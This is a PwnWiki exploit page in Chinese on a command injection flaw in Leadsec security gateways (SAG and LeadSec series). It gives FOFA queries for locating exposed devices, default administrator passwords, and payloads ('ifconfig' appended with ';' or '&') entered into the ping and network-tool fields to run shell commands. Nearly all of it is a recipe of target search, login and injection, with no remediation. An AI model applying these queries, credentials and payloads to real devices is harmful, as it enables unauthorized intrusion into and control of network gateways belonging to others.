網禦星雲-安全網關SAG系列&LeadSec系列後台命令執行漏洞

From PwnWiki

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

漏洞影響

網禦星雲安全網關SAG系列和LeadSec系列<=V3.1.3.1版本

FOFA

icon_hash="-948153991"

弱口令

administrator
administrator

漏洞利用

漏洞點位於：網關管理->網絡工具，在目的主機處填寫：

;ifconfig;

網禦星雲安全網關系列

FOFA

title="网御 安全网关"

弱口令

administrator
leadsec@7766

漏洞利用

漏洞點位於：狀態監控->網絡測試->ping處輸入：

8.8.8.8&ifconfig

參考

https://mp.weixin.qq.com/s/YLgAZAO40PY8gX6Fh8D15w

Retrieved from "https://pwnwiki.com/index.php?title=網禦星雲-安全網關SAG系列%26LeadSec系列_後台命令執行漏洞&oldid=4259"